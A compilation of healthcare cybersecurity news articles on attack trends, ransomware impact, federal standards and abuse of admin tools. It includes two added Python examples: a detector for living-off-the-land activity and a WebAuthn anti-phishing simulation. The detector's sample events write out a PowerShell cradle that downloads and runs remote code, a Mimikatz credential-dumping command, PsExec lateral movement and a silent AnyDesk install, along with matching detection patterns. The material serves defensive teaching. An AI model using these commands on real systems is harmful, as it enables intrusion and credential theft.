Healthcare Cybersecurity

Mid-Year Report Shows Healthcare Cyberattacks Have Increased by 69%

Check Point’s 2022 Mid-Year Report has revealed the healthcare industry has seen the biggest percentage rise in cyberattacks out of all industry sectors, increasing by 69% in 1H 2022 compared to 2021. Healthcare now ranks fifth highest in the number of weekly attacks, behind education, government/military, ISP/MSP, and communications.

Check Point explains in the report that 2022 has demonstrated that cyberattacks have become firmly entrenched as a state-level weapon, with the first half of the year seeing an unprecedented increase in state-sponsored attacks due to the ongoing war in Ukraine, along with a major increase in hacktivism – the recruitment of private citizens for an ‘IT Army’ for conducting attacks. Check Point says the fallout from this is likely to be felt by governments and enterprises worldwide.

The ability of cyberattacks to affect everyday lives has become crystal clear. 2022 has seen attacks conducted on TV stations that have stopped broadcasting, while attacks on critical infrastructure and government departments have crippled essential services. Many of these attacks have been conducted in Ukraine, but this is a worldwide problem. The attack on Costa Rica crippled services across the country, including healthcare, and it was not an isolated incident, with a similar attack hitting Peru shortly after. Cyberattacks that have a country-wide impact may become more common. In education, the ransomware attack on Lincoln College forced it to close its doors after 157 years, and numerous ransomware attacks on healthcare providers have caused major disruption to healthcare services.

There has been a step up from cybercriminal organizations conducting attacks for financial gain on individual organizations to them acting like nation-state-level threat actors. The Conti ransomware operation, in response to the decision of Costa Rica not to pay the ransom, sought to overthrow the government by encouraging citizens to revolt. Some cybercriminal groups now consist of hundreds of individuals and have revenues of hundreds of millions or even billions of dollars. In some cases, these groups function like genuine businesses, with some even paying for physical office space, and operating at that scale becomes difficult without at least some backing from governments in the countries where they are based. There has also been a trend that has seen cybercriminals dispense with ransomware altogether and opt for plain extortion – stealing data and demanding payment in return for not publishing or selling it, as is the modus operandi of the Lapsus$, RansomHouse, and Karakurt threat groups.

Check Point’s data shows there has been a 42% increase in cyberattacks globally in the first half of 2022, with all regions experiencing a significant escalation in cyberattacks. Globally, 23% of corporate networks have been attacked with multipurpose malware, 15% have seen attacks using cryptominers, 13% have had infostealer infections, 12% have experienced mobile attacks, and 8% have suffered ransomware attacks. Healthcare is one of the most attacked sectors, with attacks increasing by 69% to an average of 1,387 attacks on organizations every week.

In the Americas, Emotet has regained its position as the most common malware threat following its takedown by law enforcement in January 2021, which brought attacks to a grinding halt. Emotet was used in 8.6% of malware attacks in 1H 2022, with a wide range of malware variants now being used, with Formbook (4.2%), Remcos (2.3%), and XMRig (1.9%) the next most common.

High-profile vulnerabilities continue to be exploited to gain access to corporate networks, with the Atlassian Confluence RCE vulnerability (CVE-2022-26134), the Apache Log4j RCE vulnerability (CVE-2021-44228), and the F5 BIG-IP RCE vulnerability (CVE-2022-1388) the most commonly exploited.

Check Point has made predictions for the rest of the year based on attack trends identified in 1H 2022. Ransomware is expected to become a much more fragmented ecosystem, the disabling of macros is likely to see more diverse email infection chains employed, hacktivism is expected to continue to evolve, and attacks on the blockchain and crypto platforms are expected to increase.

The advice of Check Point to improve defenses is to install updates and patches regularly, adopt a prevention-first strategy and approach, install anti-ransomware solutions, improve education about cyber threats, collaborate with law enforcement and national cyber authorities, and prepare for the worst by implementing and testing incident response plans that can be immediately actioned in the event of a successful attack.

The post Mid-Year Report Shows Healthcare Cyberattacks Have Increased by 69% appeared first on HIPAA Journal.

White House Plans to Issue New Cybersecurity Standards for the Healthcare Industry

The U.S. government is taking steps to improve critical infrastructure cybersecurity, with healthcare, water, and the communications sectors the next focus areas for the White House. The White House is planning to issue new guidance and cybersecurity standards for these industries to improve resilience against malicious cyber actors, whose attacks are increasing in both frequency and sophistication.

Anne Neuberger, deputy national security advisor for cyber and emerging technology, outlined some of the key areas of focus for the White House in a recent Washington Post Live event. These steps are in line with the Biden administration’s May 2021 executive order (EO 14028) that sought to improve cybersecurity for critical infrastructure and federal information systems through public-private partnerships. A great deal of the critical infrastructure in the United States is controlled by private companies, and while there are regulations that require minimum security standards to be implemented in certain sectors, more needs to be done to ensure that standards apply to all critical infrastructure and that they actually improve resilience.

Neuberger explained that the cybersecurity of critical infrastructure in the United States lags behind other Western countries, stating the U.S. is “pretty much last in the race” when it comes to ensuring minimum cybersecurity standards are set for critical infrastructure organizations. Neuberger said one advantage of this is the U.S. will be able to learn from its many peers.

Cyberattacks on critical infrastructure have been increasing, especially ransomware attacks, many of which have hit the healthcare sector. Those attacks often have a major impact on the ability of healthcare organizations to operate. One recent Trend Micro survey indicates 25% of healthcare organizations were forced to completely halt operations following a ransomware attack, with 60% saying the attacks caused some disruption to business processes. Those attacks naturally have an impact on public safety, with some studies (Proofpoint, Censinet, Health Services Research) suggesting patient mortality increases following ransomware or other major cyberattacks.

Other major ransomware attacks on critical infrastructure include the attack on Colonial Pipeline, which disrupted fuel supplies to the Eastern Seaboard, and the attack on JBS, which disrupted food processing. Those attacks demonstrated a lack of preparedness and were a major wake-up call, clearly demonstrating cybersecurity needs to be significantly improved for all critical infrastructure and for standards to be implemented to lessen the impact of attacks should they succeed.

The bipartisan Securing Systemically Important Critical Infrastructure (SICI) Act will play a key part in the process of improving cybersecurity for all critical infrastructure. The legislation seeks to establish a transparent, stakeholder-driven process to designate systemically important critical infrastructure (SICI). The legislation requires the Director of the Cybersecurity and Infrastructure Security Agency (CISA) to establish a methodology and criteria for determining what critical infrastructure qualifies as SICI, to prioritize meaningful benefits to SICI owners and operators without any additional burden, and calls for CISA to provide SICI owners and operators with the option to take part in prioritized cybersecurity services. Currently, the government does not have a clear picture of which infrastructure qualifies as SICI or where security most needs to be improved.

President Biden has also signed the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) into law, which requires CISA to develop and implement regulations requiring covered entities to report cyber incidents and ransomware payments. Reporting will allow CISA to rapidly deploy resources and render assistance to victims suffering from attacks. It will also allow the agency to rapidly identify cyber threat trends, and quickly share relevant, actionable information with network defenders to warn other potential victims.

Healthcare is one of the main focus areas for the White House, and efforts to improve cybersecurity across the sector are underway. Neuberger confirmed that the Department of Health and Human Services has been working with partners at hospitals and has been developing minimum cybersecurity guidelines and will be working on developing new standards and guidance for securing medical devices and other broader areas of healthcare in the near future.


Study Suggests Businesses Are Not Prepared for the Escalation in Cyberattacks

Businesses are appreciating the importance of cybersecurity and realizing that they need to invest more heavily in cybersecurity as threats are evolving at such a rapid pace. The challenge for businesses is ensuring that their defenses allow them to stay one step ahead of cybercriminals, but the frequency at which data breaches are being reported suggests many businesses are struggling to keep pace.

In order to understand how to keep their businesses secure, IT leaders need to know how cybercriminals are bypassing defenses. They can then make informed decisions about the security solutions they need to invest in that will give them the best ROI in terms of security.

Keeper Security recently conducted a survey to explore how cybersecurity is transforming and where businesses are investing in cybersecurity tools. The survey was conducted on 516 IT decision-makers in the United States and the findings were published in Keeper’s 2022 U.S. Cybersecurity Census Report. The report delves into the threats that businesses face and the strategies that can be adopted by businesses to better deal with cyber threats and stay one step ahead of the threat actors that are trying to breach their networks.

Businesses realize that cybersecurity is a key priority. 71% of businesses said they have made new hires in cybersecurity in the past 12 months, but even with additional skilled staff, there is concern among businesses that they will not be able to maintain pace with the fast-evolving cyber threat landscape.

According to the study, U.S. businesses experience an average of 42 cyberattacks a year, and IT leaders predict that attacks will increase in the next 12 months. A majority of respondents said they were confident in their ability to defend against cyber threats and that they believe they have the cybersecurity solutions and tools in place to protect against attacks, even though an overwhelming majority of surveyed organizations experienced a successful cyberattack in the past year. IT leaders also report that it is now taking longer to identify and respond to cyberattacks.

The survey confirmed the impact cyberattacks are having on businesses. 31% of businesses said they had experienced a successful cyberattack that had disrupted partner/customer operations, with the same percentage saying attacks resulted in the theft of financial information. 28% said attacks caused reputational damage, with the same percentage saying corporate information was stolen. Almost a quarter said attacks resulted in disruption of the supply chain and trading/business operations. These attacks are having a considerable financial impact on businesses. On average, successful attacks cost businesses $75,000 per incident, with almost 4 in 10 organizations saying attacks have cost more than $100,000 to resolve.

While there was a high degree of confidence in cybersecurity defenses, the survey revealed the technology being used to defend against attacks was missing essential tools. Almost one-third of businesses did not have a management platform for IT secrets, such as API keys, database passwords, and privileged credentials. 84% of respondents were concerned about hard-coded credentials in source code, yet 25% of businesses did not have any software in place to remove them.

58% of Americans now spend at least some of the week working remotely, yet more than a quarter of businesses said they do not have a remote connection management solution in place to allow their IT infrastructure to be accessed securely by remote workers.

Identity and access management vulnerabilities were also identified. Only 44% of businesses said they provide their employees with best practices governing passwords and access management, and three out of 10 businesses let their employees set and manage their own passwords and admitted employees frequently share access to passwords. Only 26% of businesses said they have a highly sophisticated framework in place for visibility and control of identity security.

“This laissez-faire approach to access management makes it clear that more must be done to keep organizations and their employees protected,” explained Keeper Security in the report. “Despite these issues presenting a clear threat to businesses, fewer than half of respondents state they have plans to invest in password management, visibility tools for network-based threats, or infrastructure secrets management.”

The main areas where businesses plan to invest in security in the next 12 months are security awareness training (54%), creating a culture of compliance (50%), password management (48%), improving visibility to detect network threats (44%), infrastructure secrets management (42%), and passwordless authentication (42%). Despite its importance, only 32% of businesses said they are planning to adopt a zero-trust and zero-knowledge approach to security.

While it is encouraging to see many businesses making cybersecurity a key priority, the survey revealed a lack of transparency about cyberattacks at many businesses. 48% of IT leaders said they were aware of a cyberattack and kept it to themselves. “For U.S. businesses to become truly secure, perhaps the biggest change that must be made is cultural,” explained Keeper Security in the report. “Nearly half of IT leaders admitted to keeping a cyberattack they were aware of to themselves (suggesting they did not report it to any relevant authority). This figure should shock business leaders. Without a culture of trust, accountability, and responsiveness, cybercriminals will thrive.”


25% of Healthcare Organizations Said a Ransomware Attack Forced Them to Completely Halt Operations

Ransomware attacks continue to plague the healthcare industry. The attacks disrupt operations due to essential IT systems being taken offline, the lack of access to electronic health records causes patient safety issues, and it is common for emergency patients to be redirected to other facilities immediately after attacks and for appointments to be postponed.

Recently, cybersecurity firm Trend Micro conducted a study to investigate the impact ransomware attacks are having on healthcare organizations. The survey was conducted on 145 business and IT decision-makers in the sector, with a more extensive global study on the ransomware threat conducted by Sapio Research on 2,958 IT security decision-makers in 26 countries.

Trend Micro reports that 25% of all data breaches now involve ransomware. Between 2017 and 2021, ransomware attacks increased by 109%, and 2022 has seen a 13% year-over-year increase in attacks. These attacks are having a major impact on healthcare organizations, which have been actively targeted by several ransomware gangs.

57% of healthcare organizations said they had experienced a ransomware attack at some point in the past 3 years. 86% of healthcare organizations that suffered a ransomware attack suffered operational outages as a direct result of the attack, with 25% of organizations that experienced an attack forced to completely halt operations. 60% said that some business processes were disrupted due to the attack.

The recovery time from these attacks can be considerable, with healthcare organizations continuing to face disruption to their services for extended periods. 56% of organizations represented in the survey said it took several days to recover from the attack, with almost a quarter (24%) saying it took weeks to fully restore operations after an attack.

Data theft is now common in ransomware attacks, with threats issued to publish or sell the stolen data if the ransom is not paid. This tactic has proven so successful that some cybercriminal groups have abandoned ransomware altogether and now just steal data and threaten to publish it if payment is not made. 60% of responding organizations said sensitive data was stolen and leaked by the attackers, with the data theft and leakage leading to reputational damage and compliance risks, and increasing the investigation, remediation, and clean-up costs.

The research indicates healthcare organizations have been taking proactive steps to counter the threat and improve their defenses. 95% of responding organizations said they are patching promptly to address software vulnerabilities, 91% have implemented additional controls to prevent malicious email attachments from being delivered, and adoption of advanced detection and response tools for their network (NDR) and endpoints (EDR) is growing, as is the use of extended detection and response (XDR) solutions.

There is also considerable concern about supply chains. 43% of respondents said their partners have made them more attractive targets for attacks, 43% said a lack of visibility across the ransomware attack chain is making them more vulnerable, and 36% said a lack of visibility across their attack surface has made them a bigger target.

However, the survey revealed several security gaps. For instance, 17% of respondents did not have any remote desktop controls in place, despite RDP vulnerabilities commonly being exploited to gain initial access to healthcare networks. There is considerable room for improvement concerning threat intelligence sharing, with 30% admitting to not sharing threat intelligence with partners, 46% do not share threat information with suppliers or the broader ecosystem, and one-third (33%) said they do not share any information with law enforcement.

Only 51% of organizations use NDR, 50% use EDR, and 43% use XDR, and only 46% of organizations monitor for living-off-the-land techniques such as the malicious use of tools like Mimikatz and PsExec. Only 42% say they can detect initial access and just 32% can detect lateral movement.

“In cybersecurity, we often talk in abstractions about data breaches and network compromise. But in the healthcare sector, ransomware can have a potentially very real and very dangerous physical impact,” said Bharat Mistry, Technical Director at Trend Micro. “Operational outages put patient lives at risk. We can’t rely on the bad guys to change their ways, so healthcare organizations need to get better at detection and response and share the appropriate intelligence with partners to secure their supply chains.”


HHS Warns HPH Sector About Abuse of Legitimate Software and Security Tools by Threat Actors

It has become increasingly common for threat actors to use living-off-the-land techniques for conducting reconnaissance, privilege escalation, persistence, and moving laterally within networks undetected. The same software and security tools used by network administrators and red team professionals for legitimate purposes are abused and used to conduct attacks on victims’ infrastructure.

Threat actors leverage software tools that are already installed to avoid having to download files from the Internet, malicious activity can be hidden in the logs alongside legitimate use of the same tools, and the tools can be used to carry out malicious actions in memory to evade security solutions. Traditional approaches to security such as blocking the hashes of malicious files and blocking malicious domains are ineffective against these techniques, because nothing new is downloaded: the tools are already present and trusted on the network.

Recently, the Health Sector Cybersecurity Coordination Center (HC3) issued a white paper warning the healthcare and public health (HPH) sector about these living-off-the-land techniques to raise awareness of the threat and explain the risks of using certain tools. The tools most commonly abused by malicious actors include the penetration testing and adversary simulation frameworks Cobalt Strike and Brute Ratel; Microsoft’s cross-platform automation tool, PowerShell; the credential dumping application, Mimikatz; the Windows troubleshooting and administration utilities in the Sysinternals suite (PsExec among them); and the remote desktop application, AnyDesk.

These and other tools have been extensively used by nation-state hackers and cybercriminals in attacks on a wide range of sectors, including healthcare, and mitigating against these tools can be a significant challenge. These tools all have legitimate uses and are often deployed on common systems, but the malicious use of these tools can be difficult to detect.

Cobalt Strike, for instance, has been extensively abused by threat actors for the past 5 years. More than 8,000 attacks have been conducted that leveraged this comprehensive red team framework. The tool is commonly used by penetration testers to assess risks and vulnerabilities and simulate attacks, but the extensive capabilities of the framework are ripe for abuse. Cobalt Strike can be used as a highly customizable spear phishing tool, for discovering client-side applications, conducting exploitation/post-exploitation activities, data transfers, real-time communications, and for command and control of compromised systems. Brute Ratel is a newer and less well-known framework that has many of the same capabilities. Both of these tools are extensively used by ransomware gangs and nation-state threat actors, including in attacks on the healthcare sector.

PowerShell is a command shell and scripting language that is extensively used by IT teams for automation and configuration management, so defending against its misuse is a particular challenge. It is often not possible to block the tool outright because of the value it provides, but where it is not needed it should be disabled through group or security policies. Where it must remain available, the usual compensating controls are to remove the legacy PowerShell 2.0 engine (which bypasses modern logging), to restrict it with Constrained Language Mode or an AppLocker/WDAC policy, and to enable module, script block, and transcription logging so that encoded or obfuscated commands are recorded in the event log where they can be hunted.

AnyDesk is a remote access solution that is used to access several operating systems for providing remote IT support. AnyDesk is also commonly used for file transfers and virtual private network services. Connections are encrypted to protect against data interception, but that also makes it harder to detect malicious use. AnyDesk has been extensively used by ransomware actors, including AvosLocker and Babuk, and BazarLoader uses AnyDesk to deploy ransomware payloads.

HC3 says the Department of Health and Human Services neither endorses nor condemns the use of these tools but recommends entities in the HPH sector should carefully evaluate these tools and assess the risks and rewards, and determine whether the value provided outweighs the risks.

In the white paper, HC3 provides a detailed explanation of each of these tools, their legitimate uses, how they are abused by threat actors, and steps that can be taken to prevent and detect malicious use.
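The following script is an added example and is not code from the HC3 white paper or from HIPAA Journal. It shows the kind of detection logic the paper is asking for: process-creation events are checked for the command-line tells of the tools discussed above (an encoded PowerShell payload that is decoded and inspected, a download cradle, Mimikatz module syntax even when the binary is renamed, PsExec targeting a remote host, a silent AnyDesk install, and an Office application spawning a shell). The event records are constructed for the example and use Security event 4688 field names (NewProcessName, CommandLine, ParentProcessName); the RecordId field, the rule names, and the indicator patterns are this example's own assumptions, not HC3's.

```python
"""Flag living-off-the-land tool abuse in Windows process-creation events.

Added example, not code from the HC3 white paper. Events are constructed
dicts using Security event 4688 field names; RecordId is an assumed field.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Finding:
    record_id: int
    rule: str
    detail: str


# Indicator patterns (assumed for this example) applied to the command line
# plus any decoded PowerShell payload.
RULES = [
    ("powershell_download_cradle",
     re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression)")),
    ("mimikatz_module",
     re.compile(r"(?i)(sekurlsa::|lsadump::|privilege::debug|kerberos::golden)")),
    ("psexec_remote_exec",
     re.compile(r"(?i)\bpsexec(?:64)?\.exe\b.*\\\\[\w.-]+")),
    ("anydesk_silent_install",
     re.compile(r"(?i)anydesk(?:\.exe)?\b.*--(?:install|silent|start-with-win)")),
]
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form PowerShell expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if a valid -EncodedCommand payload is present, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(event: dict) -> List[Finding]:
    """Run every rule against one process-creation event."""
    findings: List[Finding] = []
    rid = event["RecordId"]
    image = event.get("NewProcessName", "").lower()
    parent = event.get("ParentProcessName", "").lower()
    cmd = event.get("CommandLine", "")
    text = cmd
    # 1. Encoded PowerShell: the hiding itself is the alert; also scan the decoded body.
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(Finding(rid, "powershell_encoded", decoded[:80]))
            text = cmd + "\n" + decoded
    # 2. Tool-specific command-line indicators.
    for rule, pattern in RULES:
        m = pattern.search(text)
        if m:
            findings.append(Finding(rid, rule, m.group(0)[:80]))
    # 3. Office application spawning a shell: the usual macro/phishing initial-access chain.
    if parent.endswith(OFFICE_PARENTS) and image.endswith(SHELLS):
        findings.append(Finding(rid, "office_spawned_shell", f"{parent} -> {image}"))
    return findings


def scan(events) -> Dict[int, List[str]]:
    """Map RecordId -> rule names, for events with at least one finding."""
    return {ev["RecordId"]: [f.rule for f in analyze(ev)] for ev in events if analyze(ev)}


# Constructed sample events (hostnames, paths and the IP address are made up).
SAMPLE_EVENTS = [
    {"RecordId": 1,  # benign scheduled backup script launched by the task scheduler
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"RecordId": 2,  # macro-launched, hidden, encoded download cradle
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')")},
    {"RecordId": 3,  # renamed Mimikatz binary; the module syntax still gives it away
     "NewProcessName": r"C:\Users\Public\svc_update.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'svc_update.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"RecordId": 4,  # PsExec lateral movement to a database host
     "NewProcessName": r"C:\Tools\PsExec64.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"PsExec64.exe \\HIS-DB01 -s -accepteula cmd.exe /c whoami"},
    {"RecordId": 5,  # AnyDesk silently installed from a temp directory as a persistence channel
     "NewProcessName": r"C:\Users\rn.jones\AppData\Local\Temp\AnyDesk.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r'AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in analyze(ev):
            print(f"record {f.record_id}: {f.rule} ({f.detail})")
```

Record 1 produces nothing, which is the point: an administrator's scheduled script and an attacker's hidden cradle both run powershell.exe, so the signal has to come from the arguments, the decoded payload, and the parent process rather than from the binary. Command-line matching is only a first layer; Cobalt Strike and Brute Ratel beacons are usually caught by memory, named-pipe, or network signatures rather than process arguments, and where script block logging (event 4104) is enabled the decoded script is already in the log and the base64 step is unnecessary.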


Advisory Issued About BD Totalys MultiProcessor Vulnerability

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a medical advisory about a recently discovered vulnerability that affects the BD Totalys MultiProcessor, which is used by hospitals and labs for processing clinical tissue specimens.

The vulnerability is due to the use of hard-coded credentials, which could allow an attacker with access to a vulnerable Totalys MultiProcessor to access, modify, or delete sensitive data, including personally identifiable and protected health information.

CISA rates the vulnerability as not exploitable remotely. To exploit the flaw, a malicious actor would need either physical access to the BD Totalys MultiProcessor or a foothold on the network the system is connected to, and would also need to bypass any additional security controls in place.

The vulnerability, tracked as CVE-2022-40263, affects all BD Totalys MultiProcessor versions including and prior to v1.70, and has been assigned a CVSS severity score of 6.6 out of 10 (medium severity).

The vulnerability was discovered by BD and was reported to CISA under its responsible disclosure policy. BD says the vulnerability is due to be remediated in the upcoming v1.71 software release, which is expected to be made available to users in Q4, 2022. In the meantime, BD has suggested mitigations to prevent exploitation of the vulnerability.

Users should ensure physical access controls are in place so that access to the BD Totalys MultiProcessor is restricted to authorized individuals. If the device must be networked, industry-standard security policies and procedures should be followed, such as segmenting the device from the general network and restricting which hosts can reach it.

At the time of issuing the alert, there have been no cases of exploitation of the flaw and there are no known exploits in the public domain.


Cybersecurity Awareness Month Focuses on 4 Key Behaviors

October is Cybersecurity Awareness Month – a 19-year collaborative effort between the government and industry to improve awareness of cybersecurity in the United States, led by the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA).

2022 Cybersecurity Awareness Month – See Yourself in Cyber

The theme of this year’s Cybersecurity Awareness Month is See Yourself in Cyber, where the focus is on the actions that everyone should take to improve cybersecurity. In previous years, the month of October has been divided into four weeks, each of which has a different theme. This year, rather than have a different weekly theme, the focus each week will be on one of four key behaviors that everyone should adopt. Simply practicing these basics of cybersecurity will greatly improve an individual’s and an organization’s security posture.

  1. Enabling multifactor authentication – Improve access controls by adding additional authentication requirements in addition to a password. MFA can prevent access from being granted to accounts using stolen credentials.
  2. Using strong passwords and a password manager – Set strong, unique passwords for all accounts that are resilient to brute force attacks and use a password manager to create those passwords and store them securely in an encrypted password vault.
  3. Updating software – Ensure software is kept up to date and apply patches promptly to correct known vulnerabilities.
  4. Recognizing and reporting phishing – Learn about the signs of phishing, the red flags in emails, text messages, social media posts, and telephone calls that can indicate a phishing attempt, and ensure phishing attempts are reported.

“To build a more resilient nation, everyone—from K through Gray—has a role to play, which is why our theme for this year’s Cybersecurity Awareness Month is ‘See Yourself in Cyber,'” said CISA Director Jen Easterly. “This October, we are taking this message directly to the American people because whether you’re a network defender or anyone with an internet connection, we all have a role to play in strengthening the cybersecurity of our nation.”

Improving Cybersecurity Awareness in Healthcare

Many cyberattacks succeed due to mistakes by employees and a lack of awareness of basic aspects of cybersecurity. According to the 2022 Verizon Data Breach Investigations Report, 82% of data breaches in 2021 involved the human element. Improving security awareness of the workforce by focusing on the above key behaviors will go a long way toward improving security and preventing data breaches.

Security awareness training is a requirement for compliance with the HIPAA Security Rule. The administrative safeguards of the HIPAA Security Rule require all HIPAA-regulated entities to train all workforce members on internal security policies and procedures, with the 45 CFR § 164.308 (a)(5)(i) standard requiring “a security awareness and training program for all members of its workforce (including management).”

HIPAA-regulated entities should adopt a risk-based approach when developing training courses and should teach cybersecurity basics and focus on the most important behaviors that can reduce risk. The HHS’ Office for Civil Rights has issued guidance on aspects of cybersecurity to include in security awareness training programs and raises awareness of important themes in its quarterly cybersecurity newsletters.

“The Security Rule requires regulated entities to implement a security awareness and training program for all workforce members,” explained OCR in its Q1, 2022 cybersecurity newsletter. “A regulated entity’s training program should be an ongoing, evolving process and be flexible enough to educate workforce members on new and current cybersecurity threats (e.g., ransomware, phishing) and how to respond.” OCR also stressed the need for training to be provided to all members of the workforce, which includes management personnel and senior executives.

Training should be followed up with regular security reminders, which are an addressable specification of the HIPAA Security Rule. Cybersecurity Awareness Month is the ideal time to focus on security reminders and develop a program for delivering these reminders regularly. OCR suggests security reminders can include cybersecurity newsletters, but also phishing simulations to members of the workforce to gauge the effectiveness of the security awareness and training program, and to provide additional, targeted training to employees who are fooled by the simulations. HIPAA-regulated entities should consider implementing a mechanism that allows employees to easily report phishing attempts and suspicious emails to their security teams, such as an email client add-on that allows one-click reporting, and to encourage employees this month to report potential threats.

Multifactor authentication is an effective additional safeguard for improving access controls and preventing stolen credentials from being used to access accounts. This month is the ideal time to accelerate plans to implement multifactor authentication, if it has not already been implemented, and to ensure that it is applied to all accounts. Be aware that phishing campaigns are being conducted that bypass certain types of multifactor authentication: an adversary-in-the-middle phishing page relays the victim's password and one-time code, or push approval, to the genuine login page in real time, so the attacker ends up with a valid session. To protect against these MFA bypass attacks, use phishing-resistant methods such as FIDO2 (Fast IDentity Online) security keys or certificate-based authentication, which tie the authentication to the legitimate site rather than to a code a user can be tricked into handing over.
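The following is an added example, not code from HIPAA Journal, CISA or any FIDO library, showing why FIDO2/WebAuthn resists the relay-style phishing described above. It models the relying-party checks WebAuthn requires on an authentication assertion: the authenticator signs authenticatorData together with a hash of clientDataJSON, and clientDataJSON carries the server's challenge plus the origin the browser actually saw. The hospital domain, the phishing host and the per-credential secret are constructed; as an assumption for self-containment, the authenticator's public-key signature is replaced by an HMAC over the same bytes, while the type, challenge, origin, rpIdHash, flag and counter checks are the real ones.

```python
"""Why FIDO2/WebAuthn resists adversary-in-the-middle (AiTM) phishing.

Added example, not code from HIPAA Journal, CISA or any FIDO library. It
models the relying-party (RP) checks WebAuthn requires on an authentication
assertion: the authenticator signs authenticatorData || SHA-256(clientDataJSON),
and clientDataJSON carries the challenge plus the origin the *browser* saw.
Assumption for self-containment: the authenticator's public-key signature is
replaced by an HMAC over the same bytes with a per-credential secret; every
other check (type, challenge, origin, rpIdHash, flags, counter) is the real one.
"""
import base64
import hashlib
import hmac
import json
import os

RP_ID = "mfa.example-hospital.test"                             # constructed relying party
RP_ORIGIN = "https://" + RP_ID
PHISH_ORIGIN = "https://mfa.example-hospital.test.evil.test"    # constructed AiTM proxy host
CRED_SECRET = b"\x11" * 32                                      # constructed stand-in for the key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_authenticator_data(rp_id: str, sign_count: int) -> bytes:
    """rpIdHash (32 bytes) || flags (UP=0x01 | UV=0x04) || signCount (4 bytes, big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([0x05]) + sign_count.to_bytes(4, "big")


def authenticator_sign(client_data: dict, sign_count: int) -> dict:
    """What the security key does. The browser, not the user, wrote `origin`
    into client_data, and the key never sees or types a password or OTP."""
    client_data_json = json.dumps(client_data, separators=(",", ":")).encode()
    auth_data = make_authenticator_data(RP_ID, sign_count)
    signed_bytes = auth_data + hashlib.sha256(client_data_json).digest()
    signature = hmac.new(CRED_SECRET, signed_bytes, hashlib.sha256).digest()  # stand-in for ECDSA
    return {"authenticatorData": auth_data, "clientDataJSON": client_data_json, "signature": signature}


def rp_verify(expected_challenge: bytes, assertion: dict, last_count: int) -> tuple:
    """Relying-party side: 'Verifying an Authentication Assertion' from the WebAuthn spec, abridged."""
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (stale or replayed assertion)"
    if cd.get("origin") != RP_ORIGIN:
        return False, "origin mismatch: " + str(cd.get("origin"))
    ad = assertion["authenticatorData"]
    if ad[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not ad[32] & 0x01:
        return False, "user-presence flag not set"
    if int.from_bytes(ad[33:37], "big") <= last_count:
        return False, "signature counter did not increase (cloned authenticator?)"
    signed_bytes = ad + hashlib.sha256(assertion["clientDataJSON"]).digest()
    expected_sig = hmac.new(CRED_SECRET, signed_bytes, hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, assertion["signature"]):
        return False, "bad signature"
    return True, "ok"


def simulate_login(origin_seen_by_browser: str) -> tuple:
    """One login. An AiTM proxy relays the RP's challenge unchanged, exactly as it
    would relay a password or OTP, but the victim's browser stamps the proxy's
    origin into clientDataJSON, so the signed assertion is useless to the proxy."""
    challenge = os.urandom(32)
    client_data = {"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin_seen_by_browser}
    assertion = authenticator_sign(client_data, sign_count=7)
    return rp_verify(challenge, assertion, last_count=6)


if __name__ == "__main__":
    print("direct login :", simulate_login(RP_ORIGIN))
    print("via AiTM page:", simulate_login(PHISH_ORIGIN))
```

The point the two runs make is that nothing the user does differently protects them: the same key, the same touch and the same relayed challenge produce an assertion the real site rejects purely because the origin check fails. That check has no analogue in OTP or push-based MFA, which is why those can be relayed.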

Brute force attacks often succeed because employees set weak passwords, and credential stuffing attacks succeed because passwords are reused across multiple accounts. HIPAA-regulated entities should enforce their password policies, but also make compliance with those policies easier for employees by supplying a business password manager. Password managers can generate truly random, complex, unique passwords for each account and store them in an encrypted vault, which greatly improves password security and management.

It is easy to focus on technical defenses for protecting ePHI and preventing unauthorized access, but the importance of training cannot be overstated. Ensuring all employees are aware of the above key behaviors and are practicing good cyber hygiene will go a long way toward improving the cybersecurity posture of the entire organization.

